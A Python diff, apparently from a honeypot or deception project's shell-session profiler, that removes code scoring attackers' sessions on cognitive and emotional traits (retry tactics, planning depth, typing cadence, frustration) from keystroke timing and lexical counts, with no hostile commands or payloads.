    ``ctx.commands``, when either group is empty (no clean baseline or
    no errors), or when the success-group median is not positive.

    Confidence is 0.40 while the error group holds fewer than
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` samples, 0.60 otherwise.
    """
    commands = ctx.commands
    per_cmd_iats = ctx.intra_command_iats
    if len(commands) < 2 or len(per_cmd_iats) != len(commands):
        return

    after_error: list[float] = []
    after_success: list[float] = []
    for idx in range(1, len(commands)):
        gaps = per_cmd_iats[idx]
        if gaps:
            typical_gap = statistics.median(gaps)
            bucket = after_error if commands[idx - 1].errored else after_success
            bucket.append(typical_gap)

    if not (after_error and after_success):
        return

    err_median = statistics.median(after_error)
    ok_median = statistics.median(after_success)
    if ok_median <= 0.0:
        # A non-positive baseline cannot serve as the denominator.
        return
    relative_shift = abs(err_median - ok_median) / ok_median

    if relative_shift < FRUSTRATION_LOW_MAX:
        verdict = "low"
    elif relative_shift < FRUSTRATION_MODERATE_MAX:
        verdict = "moderate"
    else:
        verdict = "high"

    well_sampled = len(after_error) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.frustration_typing",
        value=verdict,
        confidence=0.60 if well_sampled else 0.40,
    )
|
||||
|
||||
|
||||
def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.retry_tactic``.

    Each errored command is classified by what came *next*:

    * **rerun** — the next command has the same ``first_token_hash``
      (same tool re-invoked; argument edits are invisible to us).
    * **switch** — the next command has a different ``first_token_hash``.
    * **abort** — there is no next command; the session ended on the
      error.

    The emitted value is the most frequent reaction across all errored
    commands, with ties resolved in registry order (rerun > modify >
    switch > abort). No observation is produced when nothing errored —
    the registry has no ``unknown`` here.

    ``modify`` (edit-and-retry) would need argument-level diffing, which
    crosses the PII boundary (only ``first_token_hash`` is kept per
    command), so v0.1 never emits it.

    Confidence is 0.40 while fewer than
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands errored, 0.65 otherwise.
    """
    commands = ctx.commands
    failures = [(pos, cmd) for pos, cmd in enumerate(commands) if cmd.errored]
    if not failures:
        return

    # Key order doubles as the registry tie-break order; `modify` is
    # deferred and therefore has no counter.
    tally = dict.fromkeys(("rerun", "switch", "abort"), 0)
    final_pos = len(commands) - 1
    for pos, failed in failures:
        if pos >= final_pos:
            reaction = "abort"
        elif commands[pos + 1].first_token_hash == failed.first_token_hash:
            reaction = "rerun"
        else:
            reaction = "switch"
        tally[reaction] += 1

    # max() keeps the first maximal key it meets, and dicts iterate in
    # insertion order, so ties fall to the earlier registry entry.
    verdict = max(tally, key=tally.get)

    well_sampled = len(failures) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.retry_tactic",
        value=verdict,
        confidence=0.65 if well_sampled else 0.40,
    )
|
||||
|
||||
|
||||
def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.

    The signal is the absolute number of distinct ``first_token_hash``
    values in the session:

    * ≤ ``TOOL_VOCAB_NARROW_MAX`` → ``narrow``
    * ≥ ``TOOL_VOCAB_BROAD_MIN`` → ``broad``
    * in between → ``moderate``

    Sessions without commands emit nothing. Short sessions (fewer than
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands) still emit, at
    confidence 0.40 instead of 0.70 — few commands spread over several
    distinct tools is still a genuine vocabulary signal.
    """
    commands = ctx.commands
    if not commands:
        return

    tool_count = len(set(cmd.first_token_hash for cmd in commands))
    verdict = (
        "narrow"
        if tool_count <= TOOL_VOCAB_NARROW_MAX
        else "broad"
        if tool_count >= TOOL_VOCAB_BROAD_MIN
        else "moderate"
    )

    well_sampled = len(commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.tool_vocabulary",
        value=verdict,
        confidence=0.70 if well_sampled else 0.40,
    )
|
||||
|
||||
|
||||
def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.

    Classifies the session by the shape of its inter-command pauses
    (``ctx.inter_cmd_iats``):

    * **deep** — the share of pauses longer than ``IKI_THINK_MAX_S`` is
      at least ``PLANNING_DEEP_MIN``; the operator stops to think.
    * **reactive** — otherwise, the share of pauses no longer than
      ``INTER_CMD_INSTANT_MAX`` is at least ``PLANNING_REACTIVE_MIN``;
      knee-jerk pacing (automated runner, prepared playbook, or an LLM
      with no internal latency).
    * **shallow** — neither of the above.

    ``deep`` is tested first and wins when both shares qualify. With no
    inter-command pauses nothing is emitted (the registry has no
    ``unknown`` for this primitive). Confidence is 0.40 below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands, 0.65 otherwise.
    """
    pauses = ctx.inter_cmd_iats
    if not pauses:
        return

    total = len(pauses)
    think_share = len([p for p in pauses if p > IKI_THINK_MAX_S]) / total
    instant_share = len([p for p in pauses if p <= INTER_CMD_INSTANT_MAX]) / total

    if think_share >= PLANNING_DEEP_MIN:
        verdict = "deep"
    elif instant_share >= PLANNING_REACTIVE_MIN:
        verdict = "reactive"
    else:
        verdict = "shallow"

    well_sampled = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.planning_depth",
        value=verdict,
        confidence=0.65 if well_sampled else 0.40,
    )
|
||||
|
||||
|
||||
def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.

    Two rates are computed over the ``first_token_hash`` sequence:

    * **repetition rate** ``R = 1 - unique / n`` — how much of the
      session re-uses tools already in play.
    * **backtrack rate** ``J = backtracks / (n - 1)`` — a transition
      counts as a backtrack when the current hash differs from its
      immediate predecessor but was seen earlier in the session (a
      non-local jump; repeating the predecessor is "drilling" and is
      covered by ``R`` instead). ``J`` is 0.0 for a single command.

    Verdict, tested in this order:

    * ``J ≥ EXPLORATION_CHAOTIC_BACKTRACK_MIN`` → ``chaotic``
    * ``R ≥ EXPLORATION_TARGETED_REP_MIN`` → ``targeted``
    * otherwise → ``methodical``

    Nothing is emitted for a session with no commands. The registry has
    no ``unknown`` for this primitive, so short sessions (fewer than
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands) still emit, at
    confidence 0.40 instead of 0.60.
    """
    hashes = [cmd.first_token_hash for cmd in ctx.commands]
    n = len(hashes)
    if n == 0:
        return

    # n > 0 is guaranteed from here on, so no zero-division guard is needed.
    repetition_rate = 1.0 - (len(set(hashes)) / n)

    seen_before = {hashes[0]}
    backtracks = 0
    for previous, current in zip(hashes, hashes[1:]):
        if current != previous and current in seen_before:
            backtracks += 1
        seen_before.add(current)
    transitions = n - 1
    backtrack_rate = (backtracks / transitions) if transitions else 0.0

    if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
        value = "chaotic"
    elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
        value = "targeted"
    else:
        value = "methodical"

    confidence = 0.40 if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.60
    yield make_observation(
        ctx,
        primitive="cognitive.exploration_style",
        value=value,
        confidence=confidence,
    )
|
||||
|
||||
|
||||
def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.

    The load score is the mean of up to three sub-signals, each passed
    through ``_clip01``:

    * **chunking** — median of the per-command ``_cv`` values over
      ``ctx.intra_command_iats``, divided by
      ``COGNITIVE_LOAD_CHUNKING_REF_CV``. Fragmented mid-command typing
      pushes this up.
    * **errors** — fraction of commands with ``Command.errored`` set.
    * **pace variability** — ``_cv`` of ``ctx.inter_cmd_iats`` divided
      by ``COGNITIVE_LOAD_PACE_REF_CV``.

    A sub-signal for which ``_cv`` yields ``None`` is left out, and the
    mean is taken over the sub-signals that remain, so a session is not
    penalised for data it simply does not have.

    Score < ``COGNITIVE_LOAD_LOW_MAX`` → ``low``; score <
    ``COGNITIVE_LOAD_MEDIUM_MAX`` → ``medium``; otherwise ``high``.
    Nothing is emitted when the session has no commands. Confidence is
    0.40 below ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands, else 0.60
    (a composite of soft sub-signals, held below single-source
    primitives).

    v0.1 thresholds; D.8 re-tunes once the rest of Phase D is stable.
    """
    commands = ctx.commands
    if not commands:
        return

    # Sub-signal A: chunking — median within-command CV.
    usable_cvs = [
        cv for cv in (_cv(gaps) for gaps in ctx.intra_command_iats) if cv is not None
    ]
    chunking: float | None = None
    if usable_cvs:
        chunking = _clip01(
            statistics.median(usable_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
        )

    # Sub-signal B: share of commands that errored.
    failed = sum(1 for cmd in commands if cmd.errored)
    errors: float = _clip01(failed / len(commands))

    # Sub-signal C: variability of the pauses between commands.
    pace_cv = _cv(ctx.inter_cmd_iats)
    pace: float | None = (
        None if pace_cv is None else _clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV)
    )

    available = [part for part in (chunking, errors, pace) if part is not None]
    if not available:
        # Defensive: nothing to average.
        return
    score = sum(available) / len(available)

    if score < COGNITIVE_LOAD_LOW_MAX:
        verdict = "low"
    elif score < COGNITIVE_LOAD_MEDIUM_MAX:
        verdict = "medium"
    else:
        verdict = "high"

    well_sampled = len(commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.cognitive_load",
        value=verdict,
        confidence=0.60 if well_sampled else 0.40,
    )
|
||||
|
||||
|
||||
def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_consistency``.

    The signal is the coefficient of variation (sample stdev / mean) of
    the pauses between commands:

    * CV < ``PAUSE_CV_METRONOMIC_MAX`` → ``metronomic`` (LLM-pure;
      empirical anchor: LLM-simulated session CV ≈ 0.24 in this corpus).
    * CV ≥ ``PAUSE_CV_BIMODAL_MIN`` → ``bimodal`` (LLM-assisted human,
      heuristic). v0.1 is CV-only; true bimodal detection (Hartigan dip
      / two-peak) is filed for v0.2 per the registry's ``notes:`` field.
    * otherwise → ``variable`` (human; empirical anchor: CV ≈ 0.94).

    Nothing is emitted with fewer than two pauses or a non-positive
    mean pause. Confidence is 0.40 below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands, 0.75 otherwise.
    """
    pauses = ctx.inter_cmd_iats
    if len(pauses) < 2:
        # stdev needs at least two data points.
        return
    average = statistics.fmean(pauses)
    if average <= 0.0:
        return

    spread = statistics.stdev(pauses) / average
    verdict = (
        "metronomic"
        if spread < PAUSE_CV_METRONOMIC_MAX
        else "bimodal"
        if spread >= PAUSE_CV_BIMODAL_MIN
        else "variable"
    )

    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.75
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_consistency",
        value=verdict,
        confidence=confidence,
    )
|
||||
@@ -1,223 +0,0 @@
|
||||
"""``emotional_valence.*`` feature functions (Phase G, soft block).
|
||||
|
||||
All four primitives in this module ride a hard 0.5 confidence cap
|
||||
(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
|
||||
the feature functions, *not* via :func:`make_observation` — sample-size
|
||||
honesty may still pull confidence below 0.5.
|
||||
|
||||
Step G.5: ``emotional_valence.valence``.
Step G.6: ``emotional_valence.arousal``.
Step G.7: ``emotional_valence.stress_response``.
Step G.8: ``emotional_valence.frustration_venting``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import statistics
|
||||
from typing import Iterator
|
||||
|
||||
from behave_core.spec.envelope import Observation
|
||||
|
||||
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||
from decnet.profiler.behave_shell._features._emit import make_observation
|
||||
from decnet.profiler.behave_shell._thresholds import (
|
||||
AROUSAL_BANG_RUN_MIN,
|
||||
AROUSAL_CALM_IAT_S,
|
||||
AROUSAL_CAPS_RUN_MIN,
|
||||
AROUSAL_FAST_IAT_S,
|
||||
AROUSAL_MIN_IATS,
|
||||
EMOTIONAL_VALENCE_CONFIDENCE_CAP,
|
||||
FRUST_VENT_FULL_CONFIDENCE_MIN,
|
||||
FRUST_VENT_MIN_TYPED_CHARS,
|
||||
STRESS_DISTRESS_RATIO_MIN,
|
||||
STRESS_EUSTRESS_RATIO_MIN,
|
||||
STRESS_MIN_ERRORED_WITH_IATS,
|
||||
VALENCE_FULL_CONFIDENCE_MIN,
|
||||
VALENCE_MIN_HITS,
|
||||
VALENCE_MIN_TYPED_CHARS,
|
||||
)
|
||||
|
||||
|
||||
def _cap_soft(c: float) -> float:
    """Return *c* limited to ``EMOTIONAL_VALENCE_CONFIDENCE_CAP``.

    Values at or below the cap pass through unchanged.
    """
    if EMOTIONAL_VALENCE_CONFIDENCE_CAP < c:
        return EMOTIONAL_VALENCE_CONFIDENCE_CAP
    return c
|
||||
|
||||
|
||||
def valence(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.

    Compares the lexical counters on the context, where the negative
    side is ``negative_lex_hits + obscenity_hits``:

    * ``positive`` — positive hits outnumber the negative side and
      reach ``VALENCE_MIN_HITS``.
    * ``negative`` — the negative side outnumbers positive hits and
      reaches ``VALENCE_MIN_HITS``.
    * ``neutral`` — everything else, including ties.

    Nothing is emitted below ``VALENCE_MIN_TYPED_CHARS`` typed letters.
    Raw confidence is 0.50 from ``VALENCE_FULL_CONFIDENCE_MIN`` typed
    letters upward and 0.30 below; it then passes through the
    soft-primitive cap.
    """
    typed = ctx.typed_letter_count
    if typed < VALENCE_MIN_TYPED_CHARS:
        return

    upbeat = ctx.positive_lex_hits
    downbeat = ctx.negative_lex_hits + ctx.obscenity_hits

    verdict = "neutral"
    if upbeat > downbeat:
        if upbeat >= VALENCE_MIN_HITS:
            verdict = "positive"
    elif downbeat > upbeat:
        if downbeat >= VALENCE_MIN_HITS:
            verdict = "negative"

    if typed >= VALENCE_FULL_CONFIDENCE_MIN:
        raw = 0.50
    else:
        raw = 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.valence",
        value=verdict,
        confidence=_cap_soft(raw),
    )
|
||||
|
||||
|
||||
def arousal(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
    high_agitated}.

    Only typing bursts holding at least 3 IATs are considered; with none
    of those, nothing is emitted. "Well sampled" below means the
    qualifying bursts hold at least ``AROUSAL_MIN_IATS`` IATs in total.

    ``high_agitated`` fires on any of:

    * ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` — capslock rant.
    * ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` — repeated bangs.
    * well sampled, and the fastest burst's median IAT is below
      ``AROUSAL_FAST_IAT_S``.

    ``low_calm`` — otherwise, well sampled and the slowest burst's
    median IAT exceeds ``AROUSAL_CALM_IAT_S``.

    ``medium_engaged`` — fall-through.

    Raw confidence is 0.50 when well sampled and 0.30 otherwise; it then
    passes through the soft-primitive cap.
    """
    bursts = [burst for burst in ctx.typing_bursts if len(burst) >= 3]
    if not bursts:
        return

    burst_medians = [statistics.median(burst) for burst in bursts]
    quickest = min(burst_medians)
    slowest = max(burst_medians)
    iat_total = sum(map(len, bursts))
    well_sampled = iat_total >= AROUSAL_MIN_IATS

    if (
        ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
        or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
        or (well_sampled and quickest < AROUSAL_FAST_IAT_S)
    ):
        verdict = "high_agitated"
    elif well_sampled and slowest > AROUSAL_CALM_IAT_S:
        verdict = "low_calm"
    else:
        verdict = "medium_engaged"

    raw = 0.50 if well_sampled else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.arousal",
        value=verdict,
        confidence=_cap_soft(raw),
    )
|
||||
|
||||
|
||||
def stress_response(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.stress_response`` ∈ {none,
    eustress_positive, distress_negative}.

    Compares typing speed right after an error with the rest of the
    session:

    * **post-error pool** — all intra-command IATs of commands whose
      immediate predecessor errored.
    * **baseline pool** — all intra-command IATs of every other command
      (including the first one).

    With ``ratio = median(post-error) / median(baseline)``:

    * ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` → ``eustress_positive``
      (slowed down — recovered, deliberate).
    * ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
      (sped up — anxious, mashing keys).
    * otherwise → ``none``.

    ``none`` is also the verdict when either pool is empty or the
    baseline median is not positive. Nothing is emitted for a session
    without commands.

    Raw confidence is 0.50 once at least
    ``STRESS_MIN_ERRORED_WITH_IATS`` post-error commands carried IAT
    data and 0.30 otherwise; it then passes through the soft-primitive
    cap.
    """
    commands = ctx.commands
    if not commands:
        return

    per_cmd_iats = ctx.intra_command_iats
    post_error_iats: list[float] = []
    baseline_iats: list[float] = []
    qualifying_errored = 0

    # Carries "did the previous command error?" across iterations; the
    # first command has no predecessor and therefore feeds the baseline.
    follows_error = False
    for idx, cmd in enumerate(commands):
        # Tolerate an IAT table shorter than the command list.
        iats = list(per_cmd_iats[idx]) if idx < len(per_cmd_iats) else []
        if follows_error:
            if iats:
                qualifying_errored += 1
                post_error_iats.extend(iats)
        else:
            baseline_iats.extend(iats)
        follows_error = cmd.errored

    value = "none"
    if post_error_iats and baseline_iats:
        med_post = statistics.median(post_error_iats)
        med_base = statistics.median(baseline_iats)
        if med_base > 0.0:
            ratio = med_post / med_base
            if ratio >= STRESS_EUSTRESS_RATIO_MIN:
                value = "eustress_positive"
            elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
                value = "distress_negative"

    raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.stress_response",
        value=value,
        confidence=_cap_soft(raw),
    )
|
||||
|
||||
|
||||
def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.

    A direct read of the ``ctx.obscenity_hits`` lexical counter:

    * ``detected`` — at least one hit; raw confidence 0.40.
    * ``none`` — zero hits; raw confidence 0.50 when
      ``typed_letter_count ≥ FRUST_VENT_FULL_CONFIDENCE_MIN``, else 0.30.

    Nothing is emitted below ``FRUST_VENT_MIN_TYPED_CHARS`` typed
    letters — too thin to call venting cleanly absent. The raw
    confidence passes through the soft-primitive cap.
    """
    typed = ctx.typed_letter_count
    if typed < FRUST_VENT_MIN_TYPED_CHARS:
        return

    if ctx.obscenity_hits >= 1:
        verdict, raw = "detected", 0.40
    elif typed >= FRUST_VENT_FULL_CONFIDENCE_MIN:
        verdict, raw = "none", 0.50
    else:
        verdict, raw = "none", 0.30

    yield make_observation(
        ctx,
        primitive="emotional_valence.frustration_venting",
        value=verdict,
        confidence=_cap_soft(raw),
    )
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user